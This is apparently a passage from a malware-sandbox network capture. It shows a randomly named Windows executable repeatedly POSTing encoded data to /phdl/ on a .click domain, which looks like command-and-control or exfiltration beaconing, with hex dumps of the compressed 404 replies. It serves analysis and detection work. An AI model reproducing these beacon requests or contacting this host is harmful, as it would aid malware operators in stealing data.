User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
Sep 23, 2024 14:36:57.419692039 CEST | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 23 Sep 2024 12:36:57 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.7 | 49704 | 103.21.221.48 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:37:12.936741114 CEST | 770 | OUT | POST /phdl/ HTTP/1.1
                                Host: www.tempatmudisini01.click
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.tempatmudisini01.click
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.tempatmudisini01.click/phdl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 63 59 30 74 50 74 6e 51 4a 2b 2f 32 5a 62 4b 45 36 59 49 32 62 46 4b 38 55 44 69 68 53 69 38 38 37 4b 6e 71 63 59 2f 77 63 36 78 67 73 48 38 36 6e 6e 67 77 30 77 6e 30 77 6c 7a 58 6d 32 39 44 71 42 42 55 75 66 57 43 78 75 6e 43 2f 34 6f 73 45 4c 4f 57 67 64 51 53 34 47 59 65 79 67 30 58 49 6a 41 4c 34 71 72 6f 67 75 4b 52 50 55 4c 64 73 57 6b 66 41 38 36 30 72 59 32 54 73 43 71 67 2b 65 32 36 53 61 62 4a 43 2f 6e 52 45 4a 32 39 32 33 67 30 76 6a 55 37 68 59 6e 6a 50 30 33 59 56 6a 6d 2b 63 71 42 38 6f 53 48 62 68 70 30 77 4d 72 55 6b 79 68 77 4f 49 58 74 46 64 75 43 6e 2f 6d 79 78 38 71 68 7a 64 67 69 66 50 55 4e 4e 41 67 3d 3d
                                Data Ascii: 76=cY0tPtnQJ+/2ZbKE6YI2bFK8UDihSi887KnqcY/wc6xgsH86nngw0wn0wlzXm29DqBBUufWCxunC/4osELOWgdQS4GYeyg0XIjAL4qroguKRPULdsWkfA860rY2TsCqg+e26SabJC/nREJ2923g0vjU7hYnjP03YVjm+cqB8oSHbhp0wMrUkyhwOIXtFduCn/myx8qhzdgifPUNNAg==
                                Sep 23, 2024 14:37:14.218002081 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.33
                                x-litespeed-tag: 894_HTTP.404
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                content-type: text/html; charset=UTF-8
                                link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache-control: no-cache
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                transfer-encoding: chunked
                                content-encoding: br
                                vary: Accept-Encoding
                                date: Mon, 23 Sep 2024 12:37:14 GMT
                                server: LiteSpeed
                                Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                Sep 23, 2024 14:37:14.218050957 CEST | 1236 | IN | Data Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S
                                Sep 23, 2024 14:37:14.218090057 CEST | 1236 | IN | Data Raw: 03 67 54 c8 60 cc c5 34 3d ae f6 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c
                                Data Ascii: gT`4=!p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~
                                Sep 23, 2024 14:37:14.218122959 CEST | 672 | IN | Data Raw: 25 57 2f b3 9a fc 88 a2 2b 8a 8e 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf
                                Data Ascii: %W/+i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/g
                                Sep 23, 2024 14:37:14.218157053 CEST | 1236 | IN | Data Raw: 62 c6 1b 89 92 7b 27 dc a5 b1 06 73 67 30 8e 0b 31 87 ca 9c 4f 0f 87 55 0c b7 1f 86 17 9c af eb bd d8 82 3c 9e 28 75 87 7d c9 d3 bc 58 a4 f9 66 05 f9 c4 6b 84 7b 46 47 73 5e be e0 7c b5 17 f9 b7 42 be 43 7c 9d e6 ab 30 41 31 6d d8 52 6c d6 af 72
                                Data Ascii: b{'sg01OU<(u}Xfk{FGs^|BC|0A1mRlr|DtANjo+{FL5!ky`\E(jV9Emt/29[s+&1n$BPNx*[KbiAvlKlcGhX{Bqoo#(
                                Sep 23, 2024 14:37:14.218189955 CEST | 1236 | IN | Data Raw: 2e 2d 14 be 36 28 bb db 18 57 16 8a 16 3b ed d4 ed 4c bd 56 dd fa 16 a3 ec 08 f1 39 4c ba cf 32 1b 6d ba 7d bf c4 e5 a1 75 17 43 51 55 54 88 8a 22 01 fe 23 9a 87 f6 82 5a d3 1a a9 10 8a 00 72 fe 23 12 3d 2b e7 e4 a1 c9 be 25 0d 27 bc a0 10 54 08
                                Data Ascii: .-6(W;LV9L2m}uCQUT"#Zr#=+%'TNoGSkr=rKRN]kM9+s5E9-h^[WTk jD6#b(6:+FR=9UT XjtYSD$e`33kVS_Bb
                                Sep 23, 2024 14:37:14.218224049 CEST | 1236 | IN | Data Raw: 2a 71 be 2c de 5c 64 9b 11 f8 39 bc 08 30 e4 34 8e 8f 67 2d a0 ee 16 73 5d de 14 16 5f 27 58 e2 14 ab 3a cb a3 c4 b6 41 ef 82 a4 5f 93 7b 23 24 18 eb 41 84 1b 34 b8 35 01 c2 fb 43 72 c0 20 65 1a c5 f9 8f e4 aa 1f 47 3c 84 e8 82 0f 8e b9 21 89 79
                                Data Ascii: *q,\d904g-s]_'X:A_{#$A45Cr eG<!yd?L!.rdO$,rC^GnXDR/@*)f#fY$+VRh"!^<oxJ1srI&mhq q$df"=YC7\"UJw$A4
                                Sep 23, 2024 14:37:14.218255997 CEST | 1236 | IN | Data Raw: 2b 32 f2 5f b9 72 82 6f e2 a0 73 47 e7 f0 d0 72 ee 49 6d c4 cd 98 f7 59 75 81 0e 11 49 6f be 39 62 2b da 28 b4 1e d2 e3 06 45 93 17 26 bc 5c 3b 4e 87 18 d7 1c fd 30 71 cb dc 9f 3a bc 38 6f ee a1 6d 0a a7 f8 b6 27 74 78 2c 30 80 b4 f3 37 d9 f6 87
                                Data Ascii: +2_rosGrImYuIo9b+(E&\;N0q:8om'tx,07OD36?7LP&p&yFqr,>S(tB@YWj,@N5U*SuUS*h7j .tPI4*7%xEsB-|k\h3
                                Sep 23, 2024 14:37:14.218290091 CEST | 1236 | IN | Data Raw: b0 f4 ab 37 da f0 4a 6a 0b e6 21 ff da c8 f0 f1 dd 9f e4 f5 b3 9b 95 f1 ee fd 2f 46 54 3e 8a e7 4e 39 5b 33 7b b4 df 3b df 18 ce 99 24 36 40 ea 56 85 5e c0 67 e3 9a 37 0e bd 07 0b 22 23 60 78 e5 b5 04 d9 54 64 b0 54 19 d1 50 6b d4 a5 95 4a d1 83
                                Data Ascii: 7Jj!/FT>N9[3{;$6@V^g7"#`xTdTPkJw]y^,R[^N9H7lA680*n`wcg!;nf9emXAvF3x3in`Mdm.dO0X?dCa|/5X_;4BUHuKq8!T
                                Sep 23, 2024 14:37:14.218341112 CEST | 1236 | IN | Data Raw: 39 db a8 15 cb e9 8a cd 69 4e 73 ba 62 39 ac 58 41 d7 bf 4f 41 73 c8 e1 02 e6 74 c5 96 b0 62 6b 98 de 67 49 57 6c 05 8f f1 0a 72 9a ff 4b 76 77 99 15 e1 b8 f7 7b 8d 9d b4 a0 07 15 00 2e 82 f1 3b 24 64 34 1d bf 49 e7 db 92 60 bf d0 92 0e 05 4d 21
                                Data Ascii: 9iNsb9XAOAstbkgIWlrKvw{.;$d4I`M!I2FOF+G7=IQv`,jj4D'(9A!e`#x6N^tVOo-JCEUV+wiQPT[#G5VN5]EwPW=YVV0G#Xrp
                                Sep 23, 2024 14:37:14.222953081 CEST | 256 | IN | Data Raw: 75 c0 06 1e ad 84 4b db e3 41 6a 2d f5 01 4c 0b 32 b8 6f cc 22 ba ad d9 c4 8d 18 03 5d 3d 8c 3c c8 85 23 42 cf 7c 71 94 6a 35 18 84 3f 7f 34 8d 7c e1 af 0d dd 91 8c 64 8e a7 9b cd 3c fc f9 cb e3 ae 20 fa e6 ec 1f c1 68 04 d9 c2 83 8c 50 af 67 47
                                Data Ascii: uKAj-L2o"]=<#B|qj5?4|d< hPgGd`Q8Wg:8@3zJt&{~bTf"@K<Na:f) *+O?KlR8Ma$ ),g&C:G"i&8A[;


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.7 | 49705 | 103.21.221.48 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:37:15.490607023 CEST | 790 | OUT | POST /phdl/ HTTP/1.1
                                Host: www.tempatmudisini01.click
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.tempatmudisini01.click
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.tempatmudisini01.click/phdl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 63 59 30 74 50 74 6e 51 4a 2b 2f 32 61 37 61 45 37 2f 6b 32 54 46 4b 6a 4e 44 69 68 64 43 38 34 37 4b 72 71 63 5a 37 67 66 4d 4a 67 73 69 34 36 32 54 4d 77 7a 77 6e 30 33 56 7a 57 73 57 39 4d 71 42 46 32 75 61 75 43 78 74 62 43 2f 36 67 73 45 34 32 5a 68 4e 51 51 68 57 5a 59 38 41 30 58 49 6a 41 4c 34 75 36 39 67 74 36 52 50 46 37 64 73 79 51 63 4e 63 37 47 73 59 32 54 6f 43 71 73 2b 65 32 59 53 5a 65 73 43 39 66 52 45 4a 47 39 33 69 4d 33 6c 6a 55 39 76 34 6d 72 44 47 4b 42 59 57 79 43 55 4d 46 6a 70 41 75 78 70 2f 70 53 57 4a 59 49 73 77 49 31 4d 56 4a 7a 4b 49 66 53 39 6e 32 70 78 49 56 53 43 58 48 31 43 47 73 4a 57 61 54 6c 49 2b 4c 4d 63 39 6b 38 53 59 6b 53 78 58 37 6b 51 4c 34 3d
                                Data Ascii: 76=cY0tPtnQJ+/2a7aE7/k2TFKjNDihdC847KrqcZ7gfMJgsi462TMwzwn03VzWsW9MqBF2uauCxtbC/6gsE42ZhNQQhWZY8A0XIjAL4u69gt6RPF7dsyQcNc7GsY2ToCqs+e2YSZesC9fREJG93iM3ljU9v4mrDGKBYWyCUMFjpAuxp/pSWJYIswI1MVJzKIfS9n2pxIVSCXH1CGsJWaTlI+LMc9k8SYkSxX7kQL4=
                                Sep 23, 2024 14:37:16.852230072 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.33
                                x-litespeed-tag: 894_HTTP.404
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                content-type: text/html; charset=UTF-8
                                link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache-control: no-cache
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                transfer-encoding: chunked
                                content-encoding: br
                                vary: Accept-Encoding
                                date: Mon, 23 Sep 2024 12:37:16 GMT
                                server: LiteSpeed
                                Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                Sep 23, 2024 14:37:16.852261066 CEST | 1236 | IN | Data Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S
                                Sep 23, 2024 14:37:16.852271080 CEST | 1236 | IN | Data Raw: 03 67 54 c8 60 cc c5 34 3d ae f6 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c
                                Data Ascii: gT`4=!p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~
                                Sep 23, 2024 14:37:16.852348089 CEST | 1236 | IN | Data Raw: 25 57 2f b3 9a fc 88 a2 2b 8a 8e 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf
                                Data Ascii: %W/+i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/g
                                Sep 23, 2024 14:37:16.852440119 CEST | 1236 | IN | Data Raw: 53 0c 9e 26 9c 45 5c ea 34 3d 94 0d 24 52 8b 33 49 30 99 64 36 0e 4c 0e a2 e0 22 01 25 93 0d 03 e3 fe 79 ec ca c5 f1 61 75 88 ba 67 b9 a6 cc 4c 96 83 f3 83 cd c2 bc f8 b0 f9 b5 9b e2 6a 73 e8 f6 0b ae 27 fd bb 82 5c 7d 4a 8e 13 97 2d ec 17 cd 7f
                                Data Ascii: S&E\4=$R3I0d6L"%yaugLjs'\}J-D\n4Moz^Dm]jaG!c,F!4y;&<+D\@[0W0*-Kdo\O@5xN=0E!Ws;LpD}M]hP2{=$
                                Sep 23, 2024 14:37:16.852446079 CEST | 1236 | IN | Data Raw: c1 f7 1b 30 e0 a5 c8 61 26 f0 02 bc ac 4c 45 28 60 59 eb 1c 66 7a 63 cf 18 20 90 0a 6d 7e 79 00 61 c9 6b 49 28 88 f2 8d 9b 30 90 0c 6c 83 ff 2c b1 5e b2 14 d5 3b ba da 3e 3c c6 da e4 ef 16 be f9 dd b2 87 fc 0d 85 0d 66 5a 07 14 ab b9 ed 6e 0b 9f
                                Data Ascii: 0a&LE(`Yfzc m~yakI(0l,^;><fZn]Zos:Q4O{wNN%fX2R0]3+_;"wuOue7S'4suviR~2/9E!"KuKz
                                Sep 23, 2024 14:37:16.852452993 CEST | 1236 | IN | Data Raw: e7 95 9f dc 46 80 17 3e 0b 9e 21 17 2d ab b7 29 6a 19 97 ac 69 b0 3a ab 2c cd 36 53 64 c7 35 0f e7 ab 1a 89 01 c7 1a 08 ac 5a 36 85 d9 25 53 b1 2a b0 ca 5a 59 51 f8 ce e0 95 ca 04 c9 cc f3 84 89 76 cb 2d 65 e0 de 6b 37 81 f3 ef 6f 99 49 6c 12 c1
                                Data Ascii: F>!-)ji:,6Sd5Z6%S*ZYQv-ek7oIlA$pr@u{|Brf:=->&s:9bjT'@.0G41Q/hT'GGa+Hjo0c;5aI('S M1|$SgCUz^CX
                                Sep 23, 2024 14:37:16.852458954 CEST | 1236 | IN | Data Raw: 98 a7 34 c4 25 1d bb 7b d9 3f 01 15 9d 4e e3 a5 31 55 87 96 16 b1 9e dd 32 4c ba 10 ed 49 d4 ae e0 bc f1 8e a3 f0 bf ff 5d 73 e8 e3 29 73 6d f5 34 e3 87 23 e4 fb ee dc ba ad 2e 23 c2 ce 1c f2 c4 b6 8b ed 00 b4 a4 3d dc 55 b1 12 15 49 b0 b7 61 af
                                Data Ascii: 4%{?N1U2LI]s)sm4#.#=UIaP\[X=AbN'i&]D(A~fQx!CP}dBA{:%Q7<ar?EUKvXOz'}`xtaB,Ry*/;rnO<6H[_}M;}
                                Sep 23, 2024 14:37:16.852621078 CEST | 1236 | IN | Data Raw: 0b 6e cf 64 17 4d a2 09 49 0d d2 87 ad d4 92 8a e5 9b 7c 5a 8b a1 d8 c3 68 80 8e f5 a2 22 17 a4 65 5b 85 58 2e f7 24 9a bc f9 f5 b6 b6 45 66 12 fd a3 3c 13 df bf 50 33 d4 38 7f b7 19 22 13 73 8d 15 ae e4 48 ab 76 76 89 0e 45 55 d3 19 f7 cc f0 a8
                                Data Ascii: ndMI|Zh"e[X.$Ef<P38"sHvvEUZR!r,+DC(9(53likXr6`i&v3[R@J7sSTs(P)n!M&`AX,ACcEj 4kvl$Nk.vC,VByLfjh/xMIX$%IJ
                                Sep 23, 2024 14:37:16.852627993 CEST | 917 | IN | Data Raw: 3d 34 2c 63 e8 26 8a 6d 91 d6 60 aa e6 39 ff ae 91 c5 aa 98 81 e1 17 91 36 14 79 6e e5 a9 f5 1a 5a 32 5c 5a 5c 2c f6 c9 df 94 66 18 07 34 03 d1 39 a2 10 f4 69 73 f4 24 94 36 9e 71 11 19 26 15 bf 39 1e 97 69 19 03 c7 5f 8b e7 79 90 2f 62 67 69 13
                                Data Ascii: =4,c&m`96ynZ2\Z\,f49is$6q&9i_y/bgi]h/8G''qPjO@88'Q1)nC+5BZ)w}Gz`Kl!U&<*p!zLU-n956@F&2^^=t>EU~
                                Sep 23, 2024 14:37:16.852647066 CEST | 11 | IN | Data Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 10


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.7 | 49707 | 103.21.221.48 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:37:18.036112070 CEST | 1803 | OUT | POST /phdl/ HTTP/1.1
                                Host: www.tempatmudisini01.click
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.tempatmudisini01.click
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.tempatmudisini01.click/phdl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 63 59 30 74 50 74 6e 51 4a 2b 2f 32 61 37 61 45 37 2f 6b 32 54 46 4b 6a 4e 44 69 68 64 43 38 34 37 4b 72 71 63 5a 37 67 66 50 70 67 73 55 45 36 6b 45 59 77 79 77 6e 30 34 46 7a 62 73 57 39 72 71 46 70 79 75 61 71 30 78 6f 66 43 74 76 30 73 47 4a 32 5a 75 4e 51 51 38 47 5a 49 79 67 30 4f 49 6a 51 48 34 71 6d 39 67 74 36 52 50 48 6a 64 6c 47 6b 63 50 63 36 30 72 59 32 58 73 43 71 49 2b 65 76 6e 53 61 7a 5a 43 4e 2f 52 46 74 69 39 77 51 55 33 2f 6a 55 2f 73 34 6e 74 44 47 47 6b 59 57 47 67 55 4d 5a 64 70 44 4f 78 71 5a 73 58 44 6f 46 52 34 42 77 71 50 47 46 2b 48 6f 62 42 2f 6b 2b 56 36 71 56 42 4d 31 6d 4a 62 33 4d 69 51 73 61 6d 4b 75 76 6a 56 38 38 5a 61 4f 78 70 71 6d 33 48 4c 50 56 72 6d 34 2b 67 35 46 37 54 33 4d 59 44 2f 6a 63 64 4c 6c 53 52 35 49 51 5a 79 74 65 55 33 33 63 6d 73 59 76 32 31 55 76 32 79 54 70 37 56 56 33 4c 51 4f 74 69 58 76 78 67 75 56 47 5a 62 74 4e 50 34 68 32 67 64 72 51 68 4a 37 65 51 71 48 35 78 68 4c 6e 2f 2f 30 62 6b 69 6d 6e 35 4b 4d 49 6b 66 67 65 67 45 47 72 [TRUNCATED]
                                Data Ascii: 76=[TRUNCATED]
                                Sep 23, 2024 14:37:19.355966091 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.33
                                x-litespeed-tag: 894_HTTP.404
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                content-type: text/html; charset=UTF-8
                                link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache-control: no-cache
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                content-length: 11547
                                content-encoding: br
                                vary: Accept-Encoding
                                date: Mon, 23 Sep 2024 12:37:19 GMT
                                server: LiteSpeed
                                Data Raw: e2 af 3b 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 [TRUNCATED]
